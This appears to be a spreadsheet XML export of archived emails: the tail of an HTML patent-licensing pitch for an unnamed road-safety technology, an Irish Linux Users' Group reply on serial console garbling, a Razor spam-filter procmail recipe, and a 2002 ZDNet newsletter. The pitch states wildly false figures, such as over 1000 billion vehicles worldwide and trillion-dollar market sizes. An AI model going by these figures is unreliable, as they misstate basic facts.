 &lt;p&gt;&lt;div align="center"&gt;&lt;font face="Arial" &lt;strong&gt;&lt;u&gt;ANNEXURE&lt;/strong&gt;&lt;/u&gt;&lt;/div&gt;
 &lt;/p&gt;&lt;br&gt;
 &lt;p&gt;&lt;OL&gt;&lt;LI&gt;&lt;font face="Arial" &lt;strong&gt;&lt;font color="Red"&gt;&lt;b&gt;&lt;u&gt;The  STATISTICS &lt;/b&gt;&lt;/u&gt;&lt;/font&gt;pertaining to road transport worldwide: -&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;&lt;br&gt; 
 &lt;p&gt;
 &lt;font color="Red"&lt;b&gt;&lt;u&gt;
 (a) Number of people dying worldwide&lt;/b&gt;&lt;/u&gt;&lt;/font&gt; - More than 1.2 million per year = More than 1,00,000 per month = More than 3300 per day = More than 120 per hour = More than 2 per minute = At least 1 person is dying every 30 seconds&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;&lt;br&gt;&lt;br&gt;
 &lt;p&gt;&lt;font face="Arial" &lt;strong&gt;&lt;font color="Red" &lt;b&gt;&lt;u&gt;
 (b) Number of people getting injured worldwide&lt;/b&gt;&lt;/u&gt;&lt;/font&gt;   - = More than 32 million per year = More than 2 million per month = More than 60,000 per day = More than 4000 per hour = at least 1 person every second. 
 (One person seriously injured every three seconds; one person moderately injured every three seconds; one person mildly injured every three seconds.)
 &lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;&lt;br&gt;&lt;p&gt;&lt;font face="Arial"
 &lt;strong&gt;&lt;font color="Red" &lt;b&gt;&lt;u&gt;(c) Current yearly automobile sales worldwide&lt;/b&gt;&lt;/u&gt;&lt;/font&gt; - more than 1000 Billion US$. &lt;/strong&gt;&lt;/font&gt;&lt;/p&gt; 
 &lt;p&gt;&lt;font face ="Arial" &lt;strong&gt;&lt;font color="Red"&gt;&lt;b&gt;&lt;u&gt;(d) Number of automobiles worldwide &lt;/b&gt;&lt;/u&gt;&lt;/font&gt;- more than 1000 billion pieces&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;&lt;br&gt;
 &lt;p&gt;&lt;font face="Arial" &lt;strong&gt;&lt;font color="Red"&gt;&lt;b&gt;&lt;u&gt;(e) Daily loss caused due to vehicular accidents worldwide &lt;/b&gt;&lt;/u&gt;&lt;/font&gt;
 More than 2   Billion US$ per day.&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;&lt;br&gt;
 &lt;p&gt;&lt;font face="Arial" &lt;strong&gt;(2% of the worldwide Gross National Product of more than 36500 Billion US $ = More than 730 US$ per year= More than 2 Billion US$ per day)&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;&lt;br&gt;
 &lt;p&gt;&lt;LI&gt;&lt;font face ="Arial" &lt;strong&gt;The&lt;font color="Red"&gt;&lt;b&gt;&lt;u&gt;ADVANTAGES &lt;/b&gt;&lt;/u&gt;&lt;/font&gt;of the technology developed by us:&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;&lt;br&gt;
 &lt;p&gt;&lt;font face="Arial" &lt;strong&gt;a. The introduction of such technology will dramatically reduce the expenses of auto-insurance. This reduction of insurance cost will be at par with or even more that the expenses incurred towards the introduction of such technology in modern day vehicles. Accordingly, the Life Insurance premier will also undergo drastic reduction. Additionally, because of saving of lives, the outgo of the insurance companies will reduce substantially.&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;&lt;br&gt;
 &lt;p&gt;&lt;font face="Arial" &lt;strong&gt;b.As per the WHO studies and projections, road accidents occupy the number nine positions by way of causes of death in the world today. It is projected by WHO that by the year 2020 they will occupy the number three positions, next only to Heart disease and Depression.
 By introduction of this technology, we are sure that this will not happen. On the contrary there will be massive reduction in the number of deaths due to road accidents and road accidents may not figure on the list of major causes of death, in the year 2020 at all.&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;&lt;br&gt;
 &lt;p&gt;&lt;font face="Arial" &lt;strong&gt;c. This technology will therefore, make all vehicles cheaper and safer. Not only will the cost be reduced, safety which is priceless in itself, will also be greatly enhanced.&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;&lt;br&gt;
 &lt;p&gt;&lt;font face="Arial" &lt;strong&gt;As and when the regular Patent Application is filed and patent is granted, the life of the patent will be 20 years. Even at the current levels, with road accidents placed at number nine on the WHO list as a major cause of death, there is a daily loss of Two Billion US$. Even at the present level, over a period of twenty years, without any interest and without any compounding, this loss works out to be: 
 2 Billion US$ X 365 days X 20 years - 14,600 Billion US$.&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;&lt;br&gt;
 &lt;p&gt;&lt;font face="Arial" &lt;strong&gt;d. Our technology will ensure that at least SEVENTY-FIVE PERCENT of the above losses are prevented. Such figure works out to be more that 10,000 Billion US$. It is important to note that this is the projection at the current level. As per the future projections, the incidents of road accidents are expected to increase. Hence, the figure is likely to be increase very substantially. In addition the Time factor and the interest factor will inflate this figure further.&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;&lt;br&gt;
 &lt;p&gt;&lt;font face="Arial" &lt;strong&gt;e. At the current levels, more than 1.2 million persons are dying every year due to road accidents. Even at the current rates, more than 24 million lives will be lost in road accidents over the next twenty years (i.e. life of the patent, when granted). Besides, at the current levels. 
 3.2 million people are injured every year. In the next twenty years, the number of people injured due to road accident, will therefore be more than half a Billion.&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;&lt;br&gt;
 &lt;p&gt;&lt;font face="Arial" &lt;strong&gt;f. If we add to that the personal, physical and psychological traumas to those directly involved in and also to those who are associated with the people involved in the road accidents. The trauma and the misery and henceforth the value of the savings, are all unmeasurable in quantities, presently known to human kind.&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;&lt;br&gt;
 &lt;p&gt;&lt;font face="Arial" &lt;strong&gt;g. Considering the figures and dynamics as explained hereinabove, it may not be improper or out of place to compare this technology with the introduction of electricity, computer or aircrafts in terms of its value to mankind.&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;&lt;br&gt;
 &lt;p&gt;&lt;font face="Arial" &lt;strong&gt;h. The benefits of this technology will be so obvious and essential that, in the very near future, the use of this technology will become unavoidable. It should and will become mandatory by law, to install such technology and the installation of such technology should and will be a pre-requisite for granting or renewal of the registration and license of all vehicles in future.&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;&lt;br&gt;
 &lt;p&gt;&lt;font face="Arial" &lt;strong&gt;i. As described hereinabove; this technology and its utility are incomparable, outthought of, and unheard of till date. It will open a new floodgate in human travel and safety measures. In future, it can and will be applied to other mode of transport, like aircrafts and trains also.  &lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;&lt;br&gt;
 &lt;p&gt;&lt;LI&gt;&lt;font face="Arial" &lt;strong&gt;. Among other things, we have the following OPTIONS available to us: -&lt;font color="Red"&gt;&lt;b&gt;&lt;u&gt;OPTIONS&lt;/b&gt;&lt;/u&gt;&lt;/font&gt;
 available to us: -&lt;/b&gt;&lt;/u&gt;&lt;/font&gt;&lt;/p&gt;&lt;br&gt;
 &lt;p&gt;&lt;font face="Arial" color="red"&gt;&lt;b&gt;&lt;u&gt;a- OUTRIGHT SALE&lt;/b&gt;&lt;/u&gt;&lt;/font&gt;&lt;/p&gt;&lt;br&gt;
 &lt;p&gt;&lt;font face="Arial" &lt;strong&gt;(a) Immediate outright sale of the idea and the concept along with our filed Applications for one time lump sum consideration. &lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;&lt;br&gt;
 &lt;p&gt;&lt;font face="Arial" &lt;strong&gt;(b) Further development of the concept and further filing of Patent and all Patent related applications, before taking steps as outlined in "a". &lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;&lt;br&gt;
 &lt;p&gt;&lt;font face="Arial" &lt;strong&gt;The process (b) will obviously increase the realization in terms of price. &lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;&lt;br&gt;
 &lt;p&gt;&lt;font face="Arial" color="Red"&gt;&lt;b&gt;&lt;u&gt;b- LICENCING OPTIONS&lt;/b&gt;&lt;/u&gt;&lt;/font&gt;&lt;/p&gt;&lt;br&gt;
 &lt;p&gt;&lt;font face="Arial" &lt;strong&gt;i)&lt;u&gt; New vehicles&lt;/u&gt;- Granting of licenses to manufacturers of automobiles, individually or collectively, all over the world for incorporation in the automobiles to be manufactured in future on fixed time or per piece basis. &lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;&lt;br&gt;
 &lt;p&gt;&lt;font face="Arial" &lt;strong&gt;ii)&lt;u&gt; Conversion of existing vehicles&lt;/u&gt; - To independent agents for conversion of the existing more than 1000 Billion vehicles all over the world. &lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;&lt;br&gt;
 &lt;p&gt;&lt;font face="Arial" color="Red"&gt;&lt;b&gt;&lt;u&gt;c - COMBINED OPTIONS&lt;/b&gt;&lt;/u&gt;&lt;/font&gt;&lt;/p&gt;&lt;br&gt;
 &lt;p&gt;&lt;font face="Arial" &lt;strong&gt;A collaborative arrangement with some private and/or government agency wherein we receive a certain down payment and then jointly distribute the licensing rights on a pre-decided sharing (partnership) arrangement.&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;&lt;br&gt;
 &lt;p&gt;&lt;LI&gt;&lt;font face="Arial" &lt;strong&gt;The &lt;font color="Red"&gt;&lt;b&gt;&lt;u&gt;ECONOMICS&lt;/font&gt;&lt;/b&gt;&lt;/u&gt; of the  project will be as follows: -&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;&lt;br&gt;
 &lt;p&gt;&lt;font face="Arial" &lt;strong&gt;1) In case any/all processes and systems described by us are incorporated in the design of&lt;font color="red"&gt;&lt;b&gt;&lt;u&gt; new vehicles&lt;/b&gt;&lt;/u&gt;&lt;/font&gt; and the new vehicles are manufactured in accordance with the modified designs, the cost escalation may not be more than 5% to 8%, and the safety and the protection will be ten times (More than) the price escalation. Hence, drop in insurance premier will compensate for the cost escalation.&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;&lt;br&gt;
 &lt;p&gt;&lt;font face="Arial" &lt;strong&gt;2) In case, the &lt;font color="Red" &lt;b&gt;&lt;u&gt;existing vehicles&lt;/b&gt;&lt;/u&gt;&lt;/font&gt; are modified, the cost involved will be approximately 10% to 15% of the value of the vehicle. 
 But partial modifications at a lower cost, which will give partial protection, may also be carried out. As a thumb rule, the cost of modification in percentage terms will be about one fifth of the percentage of safety and protection provided.&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;&lt;br&gt;
 &lt;p&gt;&lt;font face="Arial" &lt;strong&gt;3) In case the value of the vehicles is low or the life of the vehicle is about to expire, the partial modifications may be practically and economically viable, as incorporation onto a new vehicle is relatively less expensive and more protective.&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;&lt;br&gt;
 &lt;p&gt;&lt;font face="Arial" &lt;strong&gt;4) There are more than 1000 Billion motor vehicles in the world at present. Besides there are an unspecified number of non-motorized ehicles.&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;&lt;br&gt;
 &lt;p&gt;&lt;font face="Arial" &lt;strong&gt;5) Almost all of them can be converted in phased manner to a variable degree. The cost of conversion will be directly proportional to their current market value and the safety shield to be generated there from.&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;&lt;br&gt;
 &lt;p&gt;&lt;font face="Arial" &lt;strong&gt;6) Among the motorised vehicles, the conversion cost may work out of few dollars for every percent of safety shield created The exact calculation can be worked out, but over all, some of the methods may provide more safety at lower cost compared to the other which may differ in efficiency.&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;&lt;br&gt;
 &lt;p&gt;&lt;font face="Arial" &lt;strong&gt;7) Even if we consider a very vague and approximate cost of conversion of 300 US$ per vehicle, the conversion industry works out to be worth 3,00,000 Billion US$.&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;&lt;br&gt;
 &lt;p&gt;&lt;font face="Arial" &lt;strong&gt;8) Realising the potential of the product in terms of human safety, it will be reasonable to presume that majority of such conversion will be completed over a period of three years from the starting date.&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;&lt;br&gt;
 &lt;p&gt;&lt;font face="Arial" &lt;strong&gt;9) As pointed hereinabove, the size of the conversion industry may be estimated to, in the range of 1,00,000 Billion US$ per year over the next three years.&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;&lt;br&gt;
 &lt;p&gt;&lt;font face="Arial" &lt;strong&gt;10) Alternatively, considering the diversity of available motorised vehicles all over the world, conversion licensing can also be commercially viable proposition. For such conversion, licenses can be granted on-line, on receipt of on-line payments. In that case, different rates for granting conversion to vehicles having specific registration numbers can be granted in accordance with and in proportion to the size, carrying capacity and the engine power of the vehicle.&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;&lt;br&gt;
 &lt;p&gt;&lt;font face="Arial" &lt;strong&gt;11) In case, licensing is done, the creation and installation of the concerned systems will be done by the end-user, as per his circumstances and needs. However, piracy is likely to be a major problem in such licensing.&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;&lt;br&gt;
 &lt;p&gt;&lt;font face="Arial" &lt;strong&gt;12) It is likely that as and when the systems are introduced in the motorised vehicles, unusual and unprecedented demand of new vehicles is created. This will result in massive rejection of the vehicles currently playing all over the world and stimulate an entirely new market as far as motorised vehicle is concerned. The size of such market is difficult to either comprehend and/or estimate.&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;&lt;br&gt;
 &lt;p&gt;&lt;font face="Arial" color="Red"&lt;b&gt;&lt;strong&gt;&lt;u&gt;P.S.&lt;/strong&gt;&lt;/b&gt;&lt;/u&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;br&gt;
 &lt;p&gt;&lt;font face="Arial" &lt;strong&gt;1) Some of the figures have been rounded off but generally the figures are correct.&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;&lt;br&gt;
 &lt;p&gt;&lt;font face="Arial" &lt;strong&gt;2) We have tried to keep this communication brief and to the point. More details, including website references are available with us and can be provided, if required.
 &lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;
 &lt;/BODY&gt;
 &lt;/html&gt;
 ------=_NextPart_AAXPMNBMET--
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] Re: serial console question
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, Aug 01, 2002 at 05:41:03PM +0100, Paul Mc Auley mentioned:
 &gt; On Thu, 1 Aug 2002 17:15:27 +0100 
 &gt; | S+#_+ű INET __+_: 
 &gt; | S+#_+ű Ű__ M++ű _++ +_&lt;_++_.
 &gt; | S+#_+ű #+__+ S+#_+ű #+ + __+_: 
 &gt; | I+#+ _+#+_ _ +# _+ -- N+ _+#_+ű SSL
 &gt; 
 &gt; |  So it looks like some sort of setting mismatch. Various places on the web
 &gt; | say that cobalts are setup with 115200 8n1 serial ports, but someone could
 &gt; | have changed it on this particular box.
 &gt; 
 &gt; |  Anyone care to guess what's up ?
 &gt; 
 &gt; One possible is that it's toggling the VTx00 alt character set. If 
 &gt; that's the case, feeding ^O to the tty somehow (i.e. cat to the device) 
 &gt; should flip it back.
  Ah right. Seems OK now. I assume that could have happened if the terminal
 was in 9600 mode at first, getting wierd characters ?
 Kate
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [Razor-users] False Positives on EFF Messages
</t>
  </si>
  <si>
    <t xml:space="preserve">-----BEGIN PGP SIGNED MESSAGE-----
 Hash: SHA1
 de'i Friday 02 August 2002 18:01 la Marc Perkel cusku di'e
 &gt; Hi everyone,
 &gt;
 &gt; I'm the systems admin for the Electronic Frontier Foundation and I'm using
 &gt; razor running under spam assassin there and one my own personal server.
 &gt; Generally it works fine with near 0 false positives - except - that almost
 &gt; all the false positives I've seen are on messages that originated at EFF.
 &gt;
 &gt; So - I am wondering why RAZOR is catching EFF email and how is this
 &gt; happening. Below is an example of what I'm talking about.
 I added code to my procmailrc (on the other account) so that anything that 
 comes on Bugtraq and is in Razor is revoked. Bugtraq is moderated, so spam 
 doesn't get through it. The recipe revoked a message about an hour after I 
 added it.
 :0 Wc
 | razor-check
 :0 a
 {
    :0
    * !^(some Bugtraq-specific header)
    !fesmri@ixazon.dynip.com
    :0 E
    | razor-revoke
 }
 cmeclax
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.7 (GNU/Linux)
 iD8DBQE9SxOd3/k1hdmG9jMRAqz2AJ4yYsmri9qP3l8c61T9SFL5yQ1y6gCeJA71
 CretKENIo9OyI7HgLm112jI=
 =jodf
 -----END PGP SIGNATURE-----
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Moore: Speech recognition next hurdle (Tech Update)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</si>
  <si>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href="http://clickthru.online.com/Click?q=70-3vnJIdp6VKyxg2gKns2asfI8UkRR" &gt;&lt;img src="http://www.zdnet.com/techupdate/i/itnewsletter_today.gif" width="440" height="60" border="0"  alt="Tech Update Today"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=160 align=center valign=top rowspan=2 bgcolor="#ffffff"&gt;
         &lt;img src="http://www.zdnet.com/techupdate/i/gl_ad2.gif" width="160" height="16" border="0"  alt="Advertisement"&gt;&lt;br&gt;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href="http://clickthru.online.com/Click?q=85-2G2oQ7KQfYB7ViXaf70SVbToBBPR"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11, 2002&lt;/font&gt;&lt;br&gt;&lt;/div&gt;
 &lt;!--DATE--&gt;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&lt;!--LEDE ART--&gt;
            &lt;font face="arial, helvetica" size="-1"&gt;
        &lt;b&gt;David Berlind&lt;/b&gt;&lt;br&gt;
 &lt;font size="+1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=9a-b6_GQTMBGS_ss6vFigi7yr9FKgnR" &gt;
 &lt;b&gt;Moore: Speech recognition next hurdle&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Speech recognition will be the next transforming technology, but that transformation 
 may take another 50 years, says Intel co-founder Gordon Moore. Honored this week with 
 the Presidential Medal of Freedom, Moore took time to talk about the slowing down of 
 his well-known law, the economy, philanthropic priorities, and more.
 &lt;br&gt;
      &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;&lt;font size="-1"&gt;
 	 &lt;a href="http://clickthru.online.com/Click?q=af--dB8QLpqkp4HhLvydDX7NdmUVSeR" &gt;
 	 &lt;b&gt;Read the full interview&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;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href="http://clickthru.online.com/Click?q=c4-Iy9lQ0Ww9YrZN2ykHF6q-jPexAyR" &gt;Liberty Alliance set to battle Passport&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=d9-b7L_QpPwBYDz7Vsie23s1N87hJlR" &gt;Licensing plan could boost Microsoft&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ef-04uYQmkHvc0l2HBqBxDVAmoBameR" &gt;IBM looks to corner low-end storage&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=04-k9W0IFQXF_fUZs198BbBL7kOi_yR" &gt;Bluetooth: Off and running?&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=19-BLe0I2rXOlYddLsKMZ2Fz8IR7XlR" &gt;Acer gloomy on tech recovery&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=2e-eMTGIiK8vCNRPx0ktQ3DlPfP8N4R" &gt;VoiceStream, AT&amp;T Wireless to hook up?&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=43-coL5IBJAELvOlPJ9Z5VKc-3P0BcR" &gt;Dell douses Lexmark speculation&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=58-mr2xIdJHwfFhtMoYjKHbtbXYzHRR" &gt;Chip designer ARM launches China foray&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=6d-e8plIDEIKMv52pD7Bc1bJBykEmZR"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src="http://techupdate.zdnet.com/techupdate/i/dfarber.jpg"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size="+1"&gt;&lt;b&gt;Cyberterrorists don't care about your PC&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Forget about viruses. America's real cybersecurity concerns are the notoriously 
 vulnerable computer systems that control our &lt;b&gt;power and water supplies&lt;/b&gt;. 
 Robert Vamosi offers a few ideas about how to keep the infrastructure safe.
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=82-P0EYQXK1S0sKEUr6gJLkjCXMZHnR" &gt;
 &lt;b&gt;Read the full story&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;br&gt;
 &lt;p&gt;
   &lt;!-- STORY 2 --&gt;
   &lt;font size="+1"&gt;
   &lt;b&gt;Tech shores up Homeland Defense&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Computer security is becoming an increasingly critical part of President Bush's 
 proposal for a homeland defense department. When Bush formally proposed the department 
 last month, he never mentioned the Internet or cybersecurity. But as Capitol Hill 
 scrutinizes the proposal, politicians are fretting about &lt;b&gt;tech-savvy terrorists&lt;/b&gt;--and 
 insisting any new agency must shield the U.S. from &lt;b&gt;electronic attacks&lt;/b&gt; as well.
 &lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=98-FTaOQ_zabL0J79iCW5CH7esbKRiR" &gt;
 &lt;b&gt;Read the full story&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ad-_4IAQzEB4qrd-HrQhaIHsSzky0PR" &gt;
 &lt;b&gt;Bush security could get privacy czar&lt;/b&gt;&lt;/a&gt;
 &lt;P&gt;
 &lt;!-- STORY 3 --&gt;
 &lt;table cellpadding="0" cellspacing="0" border="0" width="85" align="left"&gt;
 &lt;tr valign=top&gt;
 &lt;td&gt;
   &lt;img src="http://image.com.com/techupdate/i/eknorr.gif" width="85" height="110" border="0" align="left"&gt;
 &lt;/td&gt;
                 &lt;td width=5&gt;
 &lt;img src="http://www.zdnet.com/b.gif" width=5  height=1&gt;&lt;/td&gt;
                 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;font size="+1"&gt;&lt;b&gt;Novell's new identity&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Novell seems to understand where today's sweet spot is: providing enterprises 
 with the tools they need to manage and deliver &lt;b&gt;Web services&lt;/b&gt; against the 
 identities of employees, partners, and customers. Novell, a leading Web services 
 company? It just may pull it off, says Tech Update's &lt;b&gt;Eric Knorr&lt;/b&gt;. Are you 
 looking for solutions to your &lt;b&gt;identity crisis&lt;/b&gt;? Do you think Novell can 
 provide them? 
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=c2-oXxLQUEk7XCUmilgVnxXFZcIuInR" &gt;
 &lt;b&gt;Read the full commentary&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
 &lt;!--STORY 4--&gt;
 &lt;font size="+1"&gt;&lt;b&gt;ROI calculators don"t tell the whole TCO story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 In response to David Berlind"s &lt;a href="http://clickthru.online.com/Click?q=d7-wk3ZQLWkVXpzkzFRmBekeVktk2eR" &gt;
 &lt;b&gt;Dell's formula for ROI&lt;/b&gt;&lt;/a&gt;, TCO consultant &lt;b&gt;Tom Rankin&lt;/b&gt; warns that 
 "99 percent of TCO tools do not look at the 'total' but may look at whatever parameters 
 suit the vendor to sell their products/services." His advice to clients: "Make sure they 
 can write a check to the CFO after three months."
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ec-MHyXQVy2A7CGhr11kOqFb2GVaGyR" &gt;
 &lt;b&gt;Read all his advice&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
 &lt;!--STORY 5--&gt;
 &lt;table cellpadding="0" cellspacing="0" border="0" width="85" align="left"&gt;
 &lt;tr valign=top&gt;
 &lt;td&gt;
   &lt;img src="http://image.com.com/techupdate/i/david_coursey85x110.jpg" width="85" height="110" border="0" align="left"&gt;
 &lt;/td&gt;
                 &lt;td width=5&gt;
 &lt;img src="http://www.zdnet.com/b.gif" width=5  height=1&gt;&lt;/td&gt;
                 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;font size="+1"&gt;&lt;b&gt;Microsoft's Palladium: What the hell is it? (Here's what!)&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Everybody's talking about Palladium, Microsoft's new "&lt;b&gt;trustworthy computing&lt;/b&gt;" 
 architecture. But the details on what it is and how it will work are still extremely 
 sketchy. My colleague, Anchordesk's &lt;b&gt;David Coursey&lt;/b&gt;, has been putting the pieces 
 together--and here's what he knows so far. 
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=01-9oXDI2jHgIhTjrXvurMPGPxZ6RlR" &gt;
 &lt;b&gt;Read the full commentary&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
 &lt;!-- story 6 --&gt;
 &lt;font size="+1"&gt;&lt;b&gt;Cell phone personality test&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Whether you're a total gear head or you like to keep things simple, 
 take our cell phone personality test to find out which models suit you best.
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=16-T_cjI4cFVqrk6_pDblRuaBDxRU4R" &gt;
 &lt;b&gt;Read the full story&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=2b-2FVYINzsBDYsISLwzk0xBfd-8WrR" &gt;
 &lt;b&gt;David Berlind's Rx for mobile happiness&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
 &lt;!-- Write to me --&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;Write me at &lt;a href="mailto:dan.farber@cnet.com"&gt;&lt;b&gt;dan.farber@cnet.com&lt;/b&gt;&lt;/a&gt;&lt;br&gt;&lt;br&gt;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href="http://clickthru.online.com/Click?q=40-6Pp4Idn8DzLLm0FeVXCHnpqL0wRR"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href="http://clickthru.online.com/Click?q=56-NwKYInns9SfGBcKrctPQDwwaMC9R" &gt;"Embedded XP isn't the remedy."&lt;/a&gt;&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;/font&gt;  &lt;/td&gt;
         &lt;/tr&gt;&lt;/table&gt;
 --&gt;
 &lt;!--end quote block--&gt;
         &lt;!-- review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href="http://clickthru.online.com/Click?q=6b-8g5ZIHEcwpyvOIo80ywQ-4d0P6cR" &gt;
 &lt;b&gt;Why didn't mobile platforms trip Microsoft up?&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 &lt;b&gt;Peter Judge&lt;/b&gt;: In the late 90s, we thought the diversity of mobile platforms 
 would break Microsoft's monopoly. What went wrong?
